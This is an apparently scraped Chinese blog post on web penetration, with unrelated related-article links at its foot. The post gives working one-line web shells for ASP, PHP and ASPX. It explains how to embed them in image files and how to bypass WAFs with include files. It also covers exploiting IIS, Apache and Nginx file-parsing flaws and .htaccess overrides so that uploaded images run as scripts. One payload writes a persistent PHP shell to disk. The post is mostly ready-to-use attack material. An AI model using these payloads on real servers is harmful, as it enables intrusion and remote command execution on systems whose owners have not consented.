zoukankan      html  css  js  c++  java
  • 渗透:WAF&木马

    一句话木马

    asp:<%eval request("heroes")%>

    php:<?php @eval($_POST[value]);?>

    asp:<%@ Page Language="Jscript"%>

           <%eval(Request.Item["value"])%>

    一句话木马制作:

    c32:把图片放入里边,再写入一句话

    cmd:copy /b 1.jpg+1.asp 2.jpg

    win7下右键图片,在属性->详细信息->版权内插入一句话

    小马体积小,容易隐藏,与图片结合一起上传后可以利用nigx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。

    大马体积比较大,一般50K以上。功能丰富,一般包含提权命令,磁盘管理,数据库连接接口,执行命令,有些甚至可以压缩/解压缩网站程序。这种马的隐蔽性较差,大多数代码如果不加密的话会被杀。

    文件包含绕过waf

    1,上传包含文件bao.asp:<!--include file="1.jpg"--> 将当前文件目录下1.jpg包含到asp中执行

    2,上传图片文件1.jpg:其中其实是木马

    waf不会发现1.jpg中的内容,也不会对包含文件进行拦截,因为其中没有恶意代码。

    文件解析漏洞

    一些特殊文件被iis、apache、nginx在某种情况下被解释成脚本文件的漏洞。

    IIS5.x-6.0解析漏洞

    1,目录解析:/xx.asp/1.jpg

    在网站文件夹下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都会被IIS当成asp文件来解释或执行

    2,文件解析:cracer.asp;.jpg

    在IIS6.0下,分号后边的不被解析。除了asp之外还有.asa/.cer/.cdx

    Apache解析漏洞

    Apache从右向左开始判断解析,如果为不可识别解析,就再往左判断。比如cracer.php.owf.rar,“.owf”和".rar"Apache不能识别,于是就会最终解析成cracer.php

    IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

    在默认Fast-CGI开启的状况下,上传一个名为cracer.jpg的文件,其中内容为<? PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马shell.php

    www.xxx.com/logo.gif/*.php触发漏洞(有漏洞会把前面文件当成php执行)

    htaccess文件解析

    如果在Apache中,.htaccess可被执行且可被上传,则可以尝试在其中写入:

    <FilesMatch "shell.jpg">  SetHandler application/x-httpd-php  </FilesMatch>

    然后再上传shell.jpg木马,这样就可以将其解析成.php文件

  • 相关阅读:
    PHP伪造referer访问地址
    第一个伪静态(url重写)测试
    url重写(伪静态)IIS配置图解
    两个DropDownList数据绑定联动(数据库)
    PlaceHolder
    Page之IsPostBack属性
    确定删除吗?
    很喜欢的一个组合 因为他们的音乐改变了我对许多事物的看法SAVAGE GARDEN
    DragonBones 骨骼动画引擎
    关于Flash的Sockt通信与跨域文件
  • 原文地址:https://www.cnblogs.com/bl8ck/p/9520956.html
Copyright © 2011-2022 走看看